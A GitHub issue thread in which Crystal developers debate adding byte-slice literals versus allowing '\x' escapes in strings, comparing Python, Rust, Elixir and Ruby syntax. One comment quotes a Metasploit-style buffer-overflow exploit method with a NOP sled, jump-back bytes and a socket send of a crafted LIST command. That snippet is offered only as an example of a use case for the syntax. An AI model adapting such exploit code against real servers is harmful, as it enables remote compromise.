Open asterite opened 8 years ago
I would tend towards 2 with something like https://github.com/crystal-lang/crystal/pull/2791#issuecomment-225299043 as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485.
Same here: Slice(UInt8)
is the de-facto type for binary data whereas String
may only contain UTF-8 data. I don't think it's a good idea to push the idea that it's okay to put arbitrary bytes into a String.
inspecting a string with non-valid codepoints will output
\x...
for those values
But I like that.
One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking HTTP::Client.post
. I think I like that, it's pretty convenient. Otherwise we'd need to add overloads or restrictions for Slice(UInt8)
, and HTTP::Request
will have the body as String | Slice(UInt8)
, etc.
To compare with other statically typed languaged, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings
Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well.
I very much like that String is supposed to handle UTF-8 valid data and operations on that. And nothing else. I would hate to loose that property and rather prefer convenience API added to other interfaces for handling Slice(UInt8)
. In the HTTP example binary data would need some form of content encoding to valid ASCII values anyway. Detecting to do that encoding automatically upon receiving a Slice(UInt8)
vs a String
seems actually easier than always second guessing whether String
needs it or not.
I am with @jhass here. I would keep String as valid UTF-8.
I would rather add overloads in the http client to send/receive blobs. And I definitely want to be able to embed binary resources (Slice or StaticArray and then a convenient api to wrap it)
Would it be helpful or more performant to have Base64.decode(str, io) : Nil
so I can decode the asset and stream it out with the response?
@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add.
Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:
def self.serve(filename, resp)
resp.status_code = 200
resp.write Base64.decode(WEB_ASSETS[filename])
end
I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client?
@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well.
Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream".
Just throwing thoughts in to the mixture here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible.
How about provide users to create their own literal types (maybe in %data{ ... }
format, data
can be any words for each type, and {}
can be []
or ()
) like C++11 does?
Then we can create some custom literals for Slice(UInt8)
, StaticArray(UInt8)
or other types we want? (use macro to define these works in compile-time, maybe?)
Any progress on this? Usecase in my scenario is writing bytes to an IO, as one might do when using low level packets on the wire. io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
doesn't provide 4 empty bytes as one might expect, but rather outputs a single empty byte.
@maxpowa It works for me 😕
io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1]
Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @Exilor
We can add back the
\x...
escape to string literals
This has been implemented in https://github.com/crystal-lang/crystal/commit/cd8296b88d7859b8f914a0d4bf55f7c5534c5b15, by the way.
I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation...
This should only be possible through an unsafe operation.
The alternative solution is the way to go. Bytes
literals should definitely be a thing.
And "\xff"
syntax should give an explicit error like "strings are for UTF-8 encoded text, not for arbitrary bytes".
Side note: in Python "\x**"
means "\u{**}"
, but they do have bytes literals where it means what you'd expect: b'\xff'
@oprypin but sometimes people need to do hideous things for hideous causes :) this feature is important, it's heavily relaid on in fuzzers and exploit development (yes FFS using Crystal ! :) ) https://www.offensive-security.com/metasploit-unleashed/shell/
def exploit
connected = connect_login
nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
sjump = "\xEB\xF9\x90\x90" # Jmp Back
njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)
evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end
etc....
It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax.
@bararchy, thanks for a good demonstration of the point I was making... All of these should have been Bytes
I forgot that this issue existed and just started writing a new one. Anyway... I'm just still appalled that there's a literal for invalid strings.
So, ping
Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable Slice(UInt8)
, that's a problem. Or it used to be, not anymore! Now we even have read-only slices.
So there are really no blockers now.
Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes.
I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later.
pls
What if we add:
b"some content"
For now that would be equivalent to:
"some content".to_slice
and of course you can use \xAB
for specific byte values.
We could also have:
b'x'
to be the same as 'x'.ord.to_u8
and not have it compile if it doesn't fit in an UInt8, so that would be a byte literal.
I think Rust uses the same notation.
My suggestion that I started to write:
It would be a literal that does not allow \u
escapes, and allows only ASCII characters, supplemented by the \xff
syntax for arbitrary bytes. The literal would produce Slice(UInt8)
.
I propose the syntax b"foo\x12fsdfg"
, like in Python and Rust.
Side note, Bytes[]
macro probably should be rewritten to produce a literal.
I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.
"some content".to_slice
is impossible to do if hexadecimal escapes are removed from strings, which is the main problem I have
Oh, with "some content".to_slice
I meant it would be equivalent to that. We could probably type b"hello"
as a read-only Slice(UInt8)
and put that in the ROM section of the program.
For that we'll probably need Slice
to be part of the known types for the compiler, and have @pointer
, @size
and @read_only
laid out accordingly in memory.
But for now I'd leave the ability to have \x..
escape sequences in a String. Later we can remove them, but we'll have to make sure that there's no way to create strings that are not valid in UTF-8. Maybe that will slow down everything a bit, but, well, correct code is better than fast code.
@pointer
, @size
and @read_only
could be directly followed by the data itself, with @pointer
being equal to its own address + offset.
I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is String.new(bytes or pointer)
, just raise the awareness. The problem is that people see nothing wrong with '\x' string literals and then intentionally seek out a way to recreate such strings "programmatically".
@asterite We wouldn't need to know about Slice
's internal layout, unlike String
, because we can simply define that Slice
needs to have a constructor taking a pointer and a size (which we already have). We only need to know String
's layout because we put the data contiguously. With Slice
we don't need to do that. And it's probably not worth doing it since it's a struct and LLVM will optimize since both the constructor arguments are literals.
@RX14, are you sure you understand the part about putting this in read-only data section?
@oprypin yes.... you pass a pointer to the data in the RO section to the slice contructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata.
@RX14 Please reopen this
Why was this even closed and all those other issues which are most definitely not fixed?
I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:
<<0x12>> # => <<0x12>>
<<0x21>> # => "!"
<<0xCF, 0x83>> # => "σ"
"\xCF\x83" # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83" # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">> # => <<0x12, 0xCF, 0x83>>
(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.)
An attractive feature about them is they can handle multibyte sequences:
<<0x12345678::32>> # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<18, 52, 86, 120>>
<<1.0::little>> # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>
<<0xCF83::16>> # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>> # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>> # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>
It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences.
It is important that both the Bytes
itself and the data it refers to are stored in read-only memory; the Slice
constructor that accepts a pointer is unsafe, so the data must be encapsulated behind a read-only Bytes
, with no other way to access it.
If we have an extremely fast String#valid_encoding?
, say even faster than #each_char(&)
, then the performance penalties should be very minimal. So as a starter I think we should incorporate one of the algorithms in #11873. (In fact, the standard library has never used that method since its introduction.)
Just to throw yet another an idea in:
Ruby has the .b
method for strings.
https://docs.ruby-lang.org/en/3.2/String.html#method-i-b
Maybe "bytestring\x00\x01".b
could be treated as a byteslice literal in Crystal?
(I prefer to say "a ByteSlice
" rather than "a Bytes
".)
Ruby also has ?…
for character literals (or rather single-character strings), even supporting control characters.
https://docs.ruby-lang.org/en/3.2/syntax/literals_rdoc.html#label-Strings
?\C-g == ?\a # => true
Then again, b"…"
and b'…'
or Elixir bitstrings are probably better, if they could maybe use b(…)
or b[…]
or %b(…)
instead of <<…>>
, provided they let you write things like:
b( "filemagic", 0x01, 0x02, '\a', '\C-g' )
We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.
There are several ways we can fix this:
\x...
escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve #2565 because inspecting a string with non-valid codepoints will output\x...
for those values.Slice(UInt8)
. It could just beSlice(UInt8)
, but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and writes to it. There was the idea of introducingconst [...]
for this, with which we could create static data for any kind of integer value.This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.